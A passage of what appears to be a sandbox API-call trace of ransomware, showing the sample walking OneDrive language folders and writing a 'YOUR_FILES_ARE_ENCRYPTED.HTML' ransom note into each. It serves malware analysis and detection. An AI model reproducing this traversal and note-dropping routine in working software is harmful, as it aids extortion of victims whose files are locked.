pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pa\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.123] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.123] lstrlenW (lpString=".mui") returned 4 [0113.123] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.123] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x620c61fa, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x620c61fa, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6247ff69, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.123] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0113.123] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pa\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.123] GetProcessHeap () returned 0x600000 [0113.123] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0113.123] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pa\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\pa\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0113.124] WriteFile (in: hFile=0x32c, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.125] CloseHandle (hObject=0x32c) returned 1 [0113.125] GetProcessHeap () returned 0x600000 [0113.125] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0113.125] GetProcessHeap () returned 0x600000 [0113.125] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.125] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x629b701d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x629b701d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x629b701d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="pa-arab", cAlternateFileName="")) returned 1 [0113.126] StrStrIW (lpFirst="pa-arab", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.126] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pa-arab") returned 83 [0113.126] GetProcessHeap () returned 0x600000 [0113.126] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.126] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pa-arab" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pa-arab") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pa-arab" [0113.126] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pa-arab", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pa-arab\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pa-arab\\*" [0113.126] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pa-arab\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x629b701d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x629b701d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x637def0d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0113.126] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x629b701d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x629b701d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x637def0d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="..", cAlternateFileName="")) returned 1 [0113.127] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x637def0d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x637def0d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6435835e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.127] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.127] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pa-arab\\FileSync.LocalizedResources.dll.mui") returned 119 [0113.127] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.127] lstrlenW (lpString=".mui") returned 4 [0113.127] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.127] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x637def0d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x637def0d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6435835e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.127] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0113.127] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pa-arab\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0113.127] GetProcessHeap () returned 0x600000 [0113.127] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0113.127] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pa-arab\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\pa-arab\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0113.127] WriteFile (in: hFile=0x32c, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.128] CloseHandle (hObject=0x32c) returned 1 [0113.129] GetProcessHeap () returned 0x600000 [0113.129] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0113.129] GetProcessHeap () returned 0x600000 [0113.129] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.129] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x643f0dfd, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x643f0dfd, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x643f0dfd, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="pa-arab-pk", cAlternateFileName="PA-ARA~1")) returned 1 [0113.129] StrStrIW (lpFirst="pa-arab-pk", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.129] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pa-arab-pk") returned 86 [0113.129] GetProcessHeap () returned 0x600000 [0113.129] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.129] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pa-arab-pk" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pa-arab-pk") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pa-arab-pk" [0113.129] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pa-arab-pk", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pa-arab-pk\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pa-arab-pk\\*" [0113.129] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pa-arab-pk\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x643f0dfd, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x643f0dfd, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64653213, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName=".", cAlternateFileName="")) returned 0x626638 [0113.130] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x643f0dfd, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x643f0dfd, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64653213, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="..", cAlternateFileName="")) returned 1 [0113.130] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64653213, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64653213, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64aa577d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.130] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.130] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pa-arab-pk\\FileSync.LocalizedResources.dll.mui") returned 122 [0113.130] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.130] lstrlenW (lpString=".mui") returned 4 [0113.130] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.130] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64653213, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64653213, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64aa577d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.130] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0113.130] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pa-arab-pk\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0113.130] GetProcessHeap () returned 0x600000 [0113.130] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0113.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pa-arab-pk\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\pa-arab-pk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0113.131] WriteFile (in: hFile=0x32c, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.132] CloseHandle (hObject=0x32c) returned 1 [0113.132] GetProcessHeap () returned 0x600000 [0113.132] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0113.132] GetProcessHeap () returned 0x600000 [0113.132] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.132] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64decb7e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64decb7e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64decb7e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="pl", cAlternateFileName="")) returned 1 [0113.132] StrStrIW (lpFirst="pl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.132] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pl") returned 78 [0113.132] GetProcessHeap () returned 0x600000 [0113.132] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.132] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pl" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pl") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pl" [0113.132] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pl", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pl\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pl\\*" [0113.132] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pl\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64decb7e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64decb7e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6523efba, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0113.133] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64decb7e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64decb7e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6523efba, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="..", cAlternateFileName="")) returned 1 [0113.133] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6523efba, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6523efba, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x654edd0a, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x16ec0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.133] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.133] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pl\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.133] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.133] lstrlenW (lpString=".mui") returned 4 [0113.133] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.133] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6523efba, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6523efba, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x654edd0a, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x16ec0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.133] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0113.133] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pl\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.133] GetProcessHeap () returned 0x600000 [0113.133] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0113.134] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pl\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\pl\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0113.134] WriteFile (in: hFile=0x32c, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.135] CloseHandle (hObject=0x32c) returned 1 [0113.135] GetProcessHeap () returned 0x600000 [0113.135] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0113.135] GetProcessHeap () returned 0x600000 [0113.135] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.136] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x65560215, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x65560215, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x65560215, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="prs-af", cAlternateFileName="")) returned 1 [0113.136] StrStrIW (lpFirst="prs-af", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.136] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\prs-af") returned 82 [0113.136] GetProcessHeap () returned 0x600000 [0113.136] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.138] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\prs-af" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\prs-af") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\prs-af" [0113.138] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\prs-af", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\prs-af\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\prs-af\\*" [0113.138] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\prs-af\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x65560215, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x65560215, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x65834c57, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName=".", cAlternateFileName="")) returned 0x626778 [0113.140] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x65560215, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x65560215, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x65834c57, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="..", cAlternateFileName="")) returned 1 [0113.141] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65834c57, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x65834c57, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x65b2fd08, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.141] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.141] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: 